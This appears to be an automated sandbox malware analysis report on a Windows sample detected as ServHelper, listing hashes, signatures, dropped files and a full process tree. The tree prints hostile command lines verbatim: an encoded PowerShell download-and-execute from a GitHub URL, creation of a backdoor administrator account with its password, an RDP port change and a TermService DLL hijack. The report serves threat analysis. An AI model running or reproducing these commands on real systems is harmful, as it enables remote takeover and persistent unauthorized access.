Analysis

max time kernel: 113s
max time network: 124s
platform: windows10_x64
resource: win10-en-20210920
submitted: 22-09-2021 06:21

Static task: static1

Behavioral task: behavioral1
Sample: 61d5e32562d1c70daf0a3112f7888258.exe
Resource: win7v20210408

Behavioral task: behavioral2
Sample: 61d5e32562d1c70daf0a3112f7888258.exe
Resource: win10-en-20210920

General

Target: 61d5e32562d1c70daf0a3112f7888258.exe
Size: 5.7MB
MD5: 61d5e32562d1c70daf0a3112f7888258
SHA1: 11c54ce99e87637f58c7bc0bd8134c73df9bf879
SHA256: da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
SHA512: 9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2

Malware Config

Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
flow  pid   Process
8     1308  powershell.exe
10    1308  powershell.exe
11    1308  powershell.exe
12    1308  powershell.exe
14    1308  powershell.exe
16    1308  powershell.exe
18    1308  powershell.exe
20    1308  powershell.exe
22    1308  powershell.exe

Modifies RDP port number used by Windows (1 TTP)

Sets DLL path for service in the registry (2 TTPs)

resource                                      yara_rule
behavioral2/files/0x000800000001abae-350.dat  upx
behavioral2/files/0x000a00000001abb0-351.dat  upx

Loads dropped DLL (2 IoCs)
pid   Process
1412  Process not Found
1412  Process not Found

Drops file in Program Files directory (4 IoCs)
Process: powershell.exe for every row
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI

Drops file in Windows directory (19 IoCs)
Process: powershell.exe for every row
File created                  C:\Windows\branding\mediasrv.png
File opened for modification  C:\Windows\branding\Basebrd
File opened for modification  C:\Windows\branding\ShellBrd
File opened for modification  C:\Windows\branding\wupsvc.jpg
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tl1c2fkk.jw4.psm1
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
File created                  C:\Windows\branding\mediasvc.png
File opened for modification  C:\Windows\branding\mediasrv.png
File opened for modification  C:\Windows\branding\mediasvc.png
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E23.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F01.tmp
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
File created                  C:\Windows\branding\wupsvc.jpg
File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3E82.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3EA2.tmp
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F12.tmp
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ho2h1bbl.ym0.ps1
Modifies data under HKEY_USERS (64 IoCs)
Modifies registry key (1 TTP, 1 IoC)
pid   Process
1504  reg.exe

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
description             flow  ioc
HTTP User-Agent header  10    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  11    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  12    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  14    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid   Process         entries
3584  powershell.exe  6
804   powershell.exe  3
1180  powershell.exe  3
2568  powershell.exe  3
1308  powershell.exe  3

Suspicious behavior: LoadsDriver (2 IoCs)
pid   Process
620   Process not Found
620   Process not Found

Suspicious use of AdjustPrivilegeToken (64 IoCs)
pid   Process         Token
3584  powershell.exe  SeDebugPrivilege
804   powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
1180  powershell.exe  the same 22 tokens as PID 804, in the same order
2568  powershell.exe  the same tokens as PID 804 through SeManageVolumePrivilege, then 33 (listing cut off at 64 IoCs)

Suspicious use of WriteProcessMemory (64 IoCs)
pid   Process                               ->  target pid (procid_target)
Every row below appears twice in the original listing, giving 64 entries.
2652  61d5e32562d1c70daf0a3112f7888258.exe  ->  3584 (71)
3584  powershell.exe                        ->  1076 (73)
1076  csc.exe                               ->  1412 (74)
3584  powershell.exe                        ->  804 (75)
3584  powershell.exe                        ->  1180 (78)
3584  powershell.exe                        ->  2568 (80)
3584  powershell.exe                        ->  1636 (82)
3584  powershell.exe                        ->  1504 (83)
3584  powershell.exe                        ->  1816 (84)
3584  powershell.exe                        ->  1180 (85)
1180  net.exe                               ->  1848 (86)
3584  powershell.exe                        ->  2784 (87)
2784  cmd.exe                               ->  1192 (88)
1192  cmd.exe                               ->  4088 (89)
4088  net.exe                               ->  3104 (90)
3584  powershell.exe                        ->  2800 (91)
2800  cmd.exe                               ->  1096 (92)
1096  cmd.exe                               ->  2604 (93)
2604  net.exe                               ->  984 (94)
896   cmd.exe                               ->  1880 (98)
1880  net.exe                               ->  1740 (99)
3244  cmd.exe                               ->  3848 (102)
3848  net.exe                               ->  352 (103)
1272  cmd.exe                               ->  852 (106)
852   net.exe                               ->  1816 (107)
3980  cmd.exe                               ->  1308 (111)
1308  net.exe                               ->  1432 (110)
3704  cmd.exe                               ->  3332 (114)
3332  net.exe                               ->  3752 (115)
2256  cmd.exe                               ->  1756 (118)
1756  net.exe                               ->  1736 (119)
2352  cmd.exe                               ->  1568 (122)
Processes

The bracketed number is the process depth in the tree; signatures hit by each process are listed under it.

[1] Image: C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"
    PID: 2652
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        PID: 3584
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lgm3nitg\lgm3nitg.cmdline"
            PID: 1076
            - Suspicious use of WriteProcessMemory
            [4] Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA08B.tmp" "c:\Users\Admin\AppData\Local\Temp\lgm3nitg\CSC9212ECC7539C4C0BA0BEA2E086131CD.TMP"
                PID: 1412
        [3] Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            PID: 804
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            PID: 1180
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            PID: 2568
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] Image: C:\Windows\system32\reg.exe
            Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            PID: 1636
        [3] Image: C:\Windows\system32\reg.exe
            Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            PID: 1504
            - Modifies registry key
        [3] Image: C:\Windows\system32\reg.exe
            Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            PID: 1816
        [3] Image: C:\Windows\system32\net.exe
            Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            PID: 1180
            - Suspicious use of WriteProcessMemory
            [4] Image: C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                PID: 1848
        [3] Image: C:\Windows\system32\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
            PID: 2784
            - Suspicious use of WriteProcessMemory
            [4] Image: C:\Windows\system32\cmd.exe
                Command line: cmd /c net start rdpdr
                PID: 1192
                - Suspicious use of WriteProcessMemory
                [5] Image: C:\Windows\system32\net.exe
                    Command line: net start rdpdr
                    PID: 4088
                    - Suspicious use of WriteProcessMemory
                    [6] Image: C:\Windows\system32\net1.exe
                        Command line: C:\Windows\system32\net1 start rdpdr
                        PID: 3104
        [3] Image: C:\Windows\system32\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
            PID: 2800
            - Suspicious use of WriteProcessMemory
            [4] Image: C:\Windows\system32\cmd.exe
                Command line: cmd /c net start TermService
                PID: 1096
                - Suspicious use of WriteProcessMemory
                [5] Image: C:\Windows\system32\net.exe
                    Command line: net start TermService
                    PID: 2604
                    - Suspicious use of WriteProcessMemory
                    [6] Image: C:\Windows\system32\net1.exe
                        Command line: C:\Windows\system32\net1 start TermService
                        PID: 984
        [3] Image: C:\Windows\system32\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
            PID: 1728
        [3] Image: C:\Windows\system32\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
            PID: 3848

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
    PID: 896
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe user WgaUtilAcc 000000 /del
        PID: 1880
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
            PID: 1740

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc w6OkGKLL /add
    PID: 3244
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe user WgaUtilAcc w6OkGKLL /add
        PID: 3848
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL /add
            PID: 352

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    PID: 1272
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        PID: 852
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
            PID: 1816

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    PID: 3980
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
        PID: 1308
        - Suspicious use of WriteProcessMemory

[1] Image: C:\Windows\system32\net1.exe
    Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    PID: 1432

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    PID: 3704
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
        PID: 3332
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
            PID: 3752

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user WgaUtilAcc w6OkGKLL
    PID: 2256
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\system32\net.exe
        Command line: net.exe user WgaUtilAcc w6OkGKLL
        PID: 1756
        - Suspicious use of WriteProcessMemory
        [3] Image: C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL
            PID: 1736

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic path win32_VideoController get name
    PID: 2352
    - Suspicious use of WriteProcessMemory
    [2] Image: C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic path win32_VideoController get name
        PID: 1568

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic CPU get NAME
    PID: 3080
    [2] Image: C:\Windows\System32\Wbem\WMIC.exe
        Command line: wmic CPU get NAME
        PID: 3960

[1] Image: C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 4008
    [2] Image: C:\Windows\system32\cmd.exe
        Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        PID: 2260
        [3] Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
            PID: 1308
            - Blocklisted process makes network request
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses